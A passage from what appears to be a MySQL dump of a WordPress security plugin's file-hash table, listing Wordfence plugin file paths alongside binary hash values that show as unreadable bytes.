#Y','wp-content/plugins/wordfence/css/wf-adminbar.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0\"CϷTb','hS䘷*g5)!}BlNE','',0,'?'),('@)\'Z(ӡ\0F','wp-content/plugins/wordfence/css/wf-colorbox.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PX)p!N8j','ot0\rP2NiKu','',0,'?'),('R^ۀ\\0','wp-content/plugins/wordfence/css/wf-font-awesome.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'MًV:','997dIOu-%enԻ1I','',0,'?'),('@EAzG~\r$S','wp-content/plugins/wordfence/css/wf-global.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p]$ڡ\n','淇tj?\"E\0$Ӝ Nhq3{','',0,'?'),('=S%J','wp-content/plugins/wordfence/css/wf-ionicons.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Alsj⯃','ג4ˮvM`VZ','',0,'?'),('2@됭','wp-content/plugins/wordfence/css/wf-onboarding.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/KwtG\'(','mǸ${&W>.{?Wo)=H','',0,'?'),('˼8|4CJ+','wp-content/plugins/wordfence/css/wf-roboto-font.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']Ouݵ','+hJ~ʆ*a*Gb67\r:','',0,'?'),('b\'l(9!7\'MZ','wp-content/plugins/wordfence/css/wfselect2.min.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c3,BV','ڑt4U\";t7\ZJyrb@','',0,'?'),('\\uQ?IY}\"M','wp-content/plugins/wordfence/css/wordfenceBox.1566486436.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CWY~H#]','r{\ZI5O1QӇC','',0,'?'),('͎3עJynĀM','wp-content/plugins/wordfence/fonts/fontawesome-webfont.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nq*ZF)2','&4\"\rQjXmN\"?Po\\?','',0,'?'),('2\Z {DZ-','wp-content/plugins/wordfence/fonts/ionicons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hI15[I]J','*\\&t䭨\\	gTw,1','',0,'?'),('ZQ!*','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xGIzQXKMnyrYk.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`y\0#xsGJt','Arx?j#CFOG-S$','',0,'?'),('jtZܿ,','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','raai','{JLͻ&{{T:B','',0,'?'),('>uʸ!4N2','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',;L\'dee','+GT}m)*[c5ZN-v>','',0,'?'),('m{@m','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oLFʒ4i--','Cc#1_|Z  1ɾYx','',0,'?'),('ӕ\nt0','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mpGaBNX>(','%-*Ψ6Fi\rWϹM׽WI:vD','',0,'?'),('и+:3XnNtexX','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmSU5fChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{W7h>','	2mw3)zWgv{AfHu`Co','',0,'?'),('G:Z]Y!tI\"','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jI78{rP','UkZM=OEwDw |I;','',0,'?'),(']K{ٯ`{,','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmWUlfChc-AMP6lbBP.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+EYH<YPK=S','ۋ&:^G&B2PC~','',0,'?'),('pwQFcߠb*','wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu4mxMKTU1Kg.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@$qG2k5$z','ֆF*`\'O triR:j0W\Z=j','',0,'?'),('U]R)Ym','wp-content/plugins/wordfence/fonts/roboto-KFOmCnqEu92Fr1Mu7GxMKTU1Kvnz.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nj09','\ZҨ2#s:Р\n		vØ+l','',0,'?'),('4;`߯z?	{Ǟ@','wp-content/plugins/wordfence/images/2fa-whole.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h»$\ZPfX','ƪɝU[Z~^d\'Xٮ','',0,'?'),('26,̞|keL\ns','wp-content/plugins/wordfence/images/2fa1.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/)h\\ hG8','C%0z)f @t>ɶ{T8o','',0,'?'),('J=R\'t^}\n','wp-content/plugins/wordfence/images/2fa2.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0H','npʅG06KqJ]J','',0,'?'),('様7^b\"','wp-content/plugins/wordfence/images/back_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hgi>','䏛N7g΋?Fb!}ݿC鳇','',0,'?'),('׮Fps4','wp-content/plugins/wordfence/images/back_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']H','9퇥)R$px#q {#LO','',0,'?'),('n\n\0܁-i','wp-content/plugins/wordfence/images/blocking.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'-Hf<1','A5Y9\0OtqЖL\\}a&','',0,'?'),('^yG=ڜFg;3á','wp-content/plugins/wordfence/images/button-grad-grey.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RCTy?','DH~ϨP_{!','',0,'?'),('N7A\0nnV֑','wp-content/plugins/wordfence/images/checkbox.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"G\r6|􈘀\'','y~`w(j~=뤼&ݴQ>`^x','',0,'?'),('oYڅX','wp-content/plugins/wordfence/images/flags.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W7 (˿!\Z7','Bx0%Ly6!X\\z/<n6=\ZW','',0,'?'),('.E[Jlx','wp-content/plugins/wordfence/images/forward_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_Z?N)Ҋ:5','/<>O&ȕJR݇e}(m','',0,'?'),('\0hKf\0','wp-content/plugins/wordfence/images/forward_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\0/3e4e','0Q7018ު9-z9ؽqSrĒP','',0,'?'),('窒u\rZJW+','wp-content/plugins/wordfence/images/help.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$N;\'M Y','\Z7\0r/iz;ki,=LZg','',0,'?'),('٘\"Pܞ,','wp-content/plugins/wordfence/images/icons/ajax24.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:m𙗣P','j*edoX~7&N9|L','',0,'?'),('\' oS','wp-content/plugins/wordfence/images/icons/ajax3.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mwߴtꍓ\'\ns','dz\nyKƮ\'#]x	VJR.=:','',0,'?'),('y&aA7]Dm','wp-content/plugins/wordfence/images/icons/ajaxRed16.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%B\ng2;','D,AJlOSpe؇&','',0,'?'),('4=','wp-content/plugins/wordfence/images/icons/ajaxScan.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʖѴ~fi','ߩ0ԍѦƻH\n¡;','',0,'?'),('j&V164','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r9 #{','ﾱnѿ0c~NrAug~ΔI','',0,'?'),('(x*J,LÛn<K','wp-content/plugins/wordfence/images/icons/arrow_refresh.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kw``|}$G','u/2/@H_Ilh/aU:	','',0,'?'),('6[f9? _','wp-content/plugins/wordfence/images/icons/bullet_yellow.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J&ɌԔQ<','1Nߗ׍?*ií!FMp9^.','',0,'?'),(']*J','wp-content/plugins/wordfence/images/icons/email_go.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jEH).','& qC1QU_.O31!&۴','',0,'?'),('`%{+','wp-content/plugins/wordfence/images/icons/error128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':%7!.','{h\0,]zkV{җ6nG\nxs9','',0,'?'),('z5*\ZADZCkj','wp-content/plugins/wordfence/images/icons/magnifier.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uO{:qcV\'',' atvdQ0(IjƖO$e(*','',0,'?'),('Ρ~ߓ:eo','wp-content/plugins/wordfence/images/icons/tick128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ğch4\"','V}X e~G[C峆5','',0,'?'),(';`$r$=','wp-content/plugins/wordfence/images/icons/warning128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','pGIt*Np=','*/ȾstA}.b\'\\','',0,'?'),('u64E~:','wp-content/plugins/wordfence/images/icons/working-indicator.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VF{N	\'G','fXRZ|:Ob=f[y5 ~	','',0,'?'),('X@%1Ci','wp-content/plugins/wordfence/images/lightbox-controls.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m]a\\$','Ǘh?S):i@h.Xg','',0,'?'),('?z6aDz','wp-content/plugins/wordfence/images/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:m𙗣P','j*edoX~7&N9|L','',0,'?'),('Kjh','wp-content/plugins/wordfence/images/loading_background.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'2p\nKX','Ύ%XŖF1s;Lzr璻','',0,'?'),('ﾘQ)B\n,','wp-content/plugins/wordfence/images/loading_large.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y{ObUW~Y˙','p8\'	t:Qo]{5G1E','',0,'?'),('s♼{DR[k1I','wp-content/plugins/wordfence/images/logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zFހW\rl~6','V{Q9V	J	Xqڀc','',0,'?'),('z^}¤hh3\rw','wp-content/plugins/wordfence/images/options.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VѴA','D:bw#^4BKIP?	znV_','',0,'?'),('xD.m~<2','wp-content/plugins/wordfence/images/ratelimiting.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0[MɞyP','@Sy\'N+kB3J!PbƖ','',0,'?'),('QoH*(','wp-content/plugins/wordfence/images/sort_asc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',I+ƾ=','dCTe&,)ѴFG\ZdON','',0,'?'),('57N	C=-c','wp-content/plugins/wordfence/images/sort_asc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&DKzS§0','NQ*TZ%P%jܑtZn/','',0,'?'),('lXwB*XW','wp-content/plugins/wordfence/images/sort_asc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Oɧ*X9e','v\Z|5.YX Z鹁Ź','',0,'?'),('x_,[5','wp-content/plugins/wordfence/images/sort_asc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ǐ#a]2','[8lYckl	u#KVn','',0,'?'),('?Yvq_ۮXO','wp-content/plugins/wordfence/images/sort_both.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%BQxSV.D','6\"@Xg\'W7wgJq','',0,'?'),('	7f	`','wp-content/plugins/wordfence/images/sort_both.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dm	8f|Y','~%ۉ%>BlouI)ȉ7g','',0,'?'),('7c.$P!\"򹚆','wp-content/plugins/wordfence/images/sort_desc.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<j_ˊR2','*-9.HGO6/L):Cdz','',0,'?'),('ZD:-h${ma','wp-content/plugins/wordfence/images/sort_desc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?զ)X?N','bEԚB#:(#=_(\Z|U#','',0,'?'),('xy!q).ˉ\"','wp-content/plugins/wordfence/images/sort_desc_disabled.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m͟r 9',';	_Yt7KsmC\ro','',0,'?'),('usT­BB','wp-content/plugins/wordfence/images/sort_desc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J%{OZ\"/o','^*n^\0m+!NkɌ/ԯ^k','',0,'?'),('o\'RD-\0o','wp-content/plugins/wordfence/images/support.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cl$rn<.','$MԮ&(ᩘs^	Ϣ*N','',0,'?'),('PC<	vnR8','wp-content/plugins/wordfence/images/tools.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@cI','Y=RB)	~ܖݟr','',0,'?'),('O+[IBmm\'','wp-content/plugins/wordfence/images/wf-central-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q(VѤ','\0{\rߘJ/ ^+,S','',0,'?'),('#-g\\L%3S݋B#\r','wp-content/plugins/wordfence/images/wf-horizontal.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E%Zlo9͒','0	6ӭIvhJ`','',0,'?'),('FVOd%|u','wp-content/plugins/wordfence/images/wordfence-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p]j-','8#̄(8O\"	+h\"Fb','',0,'?'),('E(zRA1;eNqD3','wp-content/plugins/wordfence/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2eª\\og',' oMJ#A|ߎ(;6R\n','',0,'?'),('.(\\ԿV\"*B','wp-content/plugins/wordfence/js/Chart.bundle.min.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5]ddf','>`NN`N\"KӞckG<;','',0,'?'),('Y.O͊M)','wp-content/plugins/wordfence/js/admin.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Ev]1','4GZtQ*\ZtljlҊa','',0,'?'),('&$ݣQ9>dz','wp-content/plugins/wordfence/js/admin.ajaxWatcher.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CCW\Z^beD','	CJhF$Dq|,7EH;N','',0,'?'),('%\nB>Wۚ;Ł@','wp-content/plugins/wordfence/js/admin.liveTraffic.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/[n1uu}',')䓣Ad98PV+H25J','',0,'?'),('O(®Rz%~X','wp-content/plugins/wordfence/js/date.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jPER_c','B=0dƩ\"BtUc^1>q&','',0,'?'),('dH])','wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89\"zzVv*]','ۆ%%l:Jf<bqPPt˯}ߝ\"f','',0,'?'),('/o\n,~;c.','wp-content/plugins/wordfence/js/jquery.colorbox-min.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y5=q)','H4\\v/XGK:gkl','',0,'?'),('(lQ,)hra*5','wp-content/plugins/wordfence/js/jquery.colorbox.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(O0%69e3j','{L#\r]\ngL8P,@Ir,{ ','',0,'?'),('¡\r+?𝒫','wp-content/plugins/wordfence/js/jquery.dataTables.min.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\\ ͕h','vAo;uD3$WB95_\" ','',0,'?'),('dC8N[$W\n&)L','wp-content/plugins/wordfence/js/jquery.qrcode.min.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԹXp`me<','wP\0pzuYDSz(WߥP3$S','',0,'?'),('\\bHZ#E_','wp-content/plugins/wordfence/js/jquery.tmpl.min.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\}\"7ڷDZ','.IH\Zg\0H!7`gޠZzȄž6|','',0,'?'),('A\rfJ6ӬOH`','wp-content/plugins/wordfence/js/jquery.tools.min.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':-Eՠx$B',',4~aTlS fQO	fTӵ;)','',0,'?'),(' rԹeqdo','wp-content/plugins/wordfence/js/knockout-3.3.0.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_B8lc^','5J9hALg@`uwo3\0I>','',0,'?'),('a̜)Δ','wp-content/plugins/wordfence/js/wfdashboard.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԽP`{i','=Pzr!?w\Z/d!LӪ1!','',0,'?'),('oj,rYG:RD','wp-content/plugins/wordfence/js/wfdropdown.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rpc\'\Z','SGs8;Z!זJu1z?','',0,'?'),('+1V9','wp-content/plugins/wordfence/js/wfglobal.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0\"ex\'','+jqA5[\0W2J5W','',0,'?'),('lZ\n{N_','wp-content/plugins/wordfence/js/wfpopover.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';&mAhlMPZX','_.V袏X4Ni_k=C3','',0,'?'),('UYGpʈIvux\r','wp-content/plugins/wordfence/js/wfselect2.min.1566486436.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J!.i','lk}[ZjA.!=+5+~q 1','',0,'?'),('R1?YVDt','wp-content/plugins/wordfence/lib/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E\"xK{8dS','C\'r9@Kކtw#@k','',0,'?'),('\'FEAvQMv','wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>\r5]xVI\'i','G݅\'!YE3P5adM','',0,'?'),('y1-/fIנ','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n&\n,.','[9Yq,#:4G[S7ίKT9Ò-]','',0,'?'),('-n$.#g%}','wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' OّCHؖs ','pXuc{-K׏ژ/OnE0)JB','',0,'?'),('`c0\\3','wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O\"%éODZj','Z?=b\0D\ZZ\'˿_pwѻ,:','',0,'?'),('ۖJBwC|Mv','wp-content/plugins/wordfence/lib/Diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5VzY]#yRJݮ','YM\"z)tϖ*cwL\01w$d','',0,'?'),('Ը%\ZDyZ','wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݟ:./cn','VKCoN¯h[F?m','',0,'?'),('J![W6ݧ','wp-content/plugins/wordfence/lib/IPTraf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WJmLIg!','0b@i[%g<F','',0,'?'),('^2^T:mJ:','wp-content/plugins/wordfence/lib/IPTrafList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<4wwZ%A','~\n)^\n20*\"$;ZmOc','',0,'?'),('au\"9s?H','wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%1sËG','EWٳ?4@U?0bP+h','',0,'?'),('Kߺb','wp-content/plugins/wordfence/lib/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>zxC}','Nܓ#dtB!\"M՞==@o','',0,'?'),('SP;^ƭzI','wp-content/plugins/wordfence/lib/conntest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q\rƉ(.Aˬ','J&grb+\'Id	1HLWreO','',0,'?'),('fNdL','wp-content/plugins/wordfence/lib/cronview.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e(t@nr','Z4,hz=>M}G/[0l\"iK','',0,'?'),('\Z;5(OOR','wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȎcP\"','זD䟹45JbOɝHR@','',0,'?'),('zvo:B%','wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݻ1(wmF','B6;M8\Z&','',0,'?'),('\rҗr׾ \n\Z','wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!Pyt8턺P6q','kwQ)\'J~MEsrXY_Gf!','',0,'?'),('$o1T2]l','wp-content/plugins/wordfence/lib/dashboard/widget_countries.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rmnZB ','݃EZ?wȖ͖s!7cJ70','',0,'?'),('Ws{NhPr㼱','wp-content/plugins/wordfence/lib/dashboard/widget_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZcQ\nbd7,Ze','ZL)1-|Y(|@.N_ϋu','',0,'?'),('e؟v笪Ej','wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/]L/Gb;','$y\r\npu ?A8KΙTcVa','',0,'?'),('L.\nw;[','wp-content/plugins/wordfence/lib/dashboard/widget_logins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g#@Xs','ĪN29WDWO0ѽmGN','',0,'?'),('u;Ȍ0qw=','wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԶwK>~\rg','#Nu}WL!\\Z 8\0;k{','',0,'?'),('k6*H	u١','wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5$g؟_ ','53=xLܑm?Z97P.','',0,'?'),('\\^s,z(','wp-content/plugins/wordfence/lib/dashboard/widget_tdf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\'p[UaH','?}mwDqn2R\\','',0,'?'),('6Ri*5æ','wp-content/plugins/wordfence/lib/dbview.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƍݵ1苙nzk','DOhB;4U7o/g8i+̷','',0,'?'),(')\0e_5=','wp-content/plugins/wordfence/lib/diffResult.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0wJn','_^>8L\\{P','',0,'?'),('#\n/PZ~h','wp-content/plugins/wordfence/lib/email_genericAlert.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L)&낆(','j{bXN#R5[׍m','',0,'?'),('Fe	57[','wp-content/plugins/wordfence/lib/email_newIssues.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S-?H6.','\03Q=gW@Dkv}͵/Jw4','',0,'?'),('^u}G','wp-content/plugins/wordfence/lib/email_unlockRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{<2m','RpM>d*','',0,'?'),('e\0hLщ','wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#}_*mD×cvW','m$G+59TEx7B{/,u7','',0,'?'),('*Q.	-c%D','wp-content/plugins/wordfence/lib/flags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ic磭c-','8YCO0j{\ZxDĖxO','',0,'?'),('$-#q`l$Wۉ','wp-content/plugins/wordfence/lib/live_activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2>(]/@ꏞf','QըW`~N_wID$J3','',0,'?'),('dTofҷbS','wp-content/plugins/wordfence/lib/menu_dashboard.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r͝ݭ5','oc@e ᤶg\ZVj','',0,'?'),('ޒ?IΩi%gy','wp-content/plugins/wordfence/lib/menu_dashboard_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j~i\'Z?','=x=)ZuY\"FF2]','',0,'?'),('WP旃^qy','wp-content/plugins/wordfence/lib/menu_firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m2_MjV','\"!bXȉr3Oe{0','',0,'?'),('3dyjV','wp-content/plugins/wordfence/lib/menu_firewall_blocking.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[? ?','b}STbcvʄ/{','',0,'?'),('Ͷjʃఱ-','wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h;BD:','\Z@\\ɔ\rqB,CKτw.z','',0,'?'),('6cbkki3@H','wp-content/plugins/wordfence/lib/menu_firewall_waf.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e(# ({秡<(s','%=oVBkC%Ir(?ceC','',0,'?'),('0dۦZP2o','wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ua~v','/[+!)fhfĳXF8/H7','',0,'?'),('WM{h(','wp-content/plugins/wordfence/lib/menu_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	:!vcI_\"|m','7*la\n\\9Gǃ>*X]q','',0,'?'),('z8 L{q','wp-content/plugins/wordfence/lib/menu_scanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z=i;',' < ҉U\Zv6n/ACvCXh','',0,'?'),('I|K9({sX','wp-content/plugins/wordfence/lib/menu_scanner_credentials.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ff:&,[','B&$q>P\nϾz&G<6Ǵ:','',0,'?'),('OHI!K!0[','wp-content/plugins/wordfence/lib/menu_scanner_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rv	jEu','!R4KΧ&>5{:oY','',0,'?'),('-jާ ~hyb','wp-content/plugins/wordfence/lib/menu_support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yy0\'Ofx2;D','.F!x,p	[\'E\Z̻,','',0,'?'),('ojyV','wp-content/plugins/wordfence/lib/menu_tools.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gԌpPIg[=','V!ޟƚ_z=|yaXȏ','',0,'?'),('!##sw:\rH*$q','wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7<Ճʟ9\nK','ёSvm(6V\nlv','',0,'?'),('!Tۦ	lI\n','wp-content/plugins/wordfence/lib/menu_tools_importExport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$^k>T|','k^XR1, c=\\','',0,'?'),('UI_Ym_','wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3c9<B2','5pC>X7L*R}AYM+f','',0,'?'),('@L߯7٭kقE','wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jlF+>Tm/av~3','Zfk%y,?SCU=lhѕ','',0,'?'),('Cs\\\ns\'m','wp-content/plugins/wordfence/lib/menu_tools_whois.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0JM(]\Z7w','[:QݔqF/qG;N@Kq08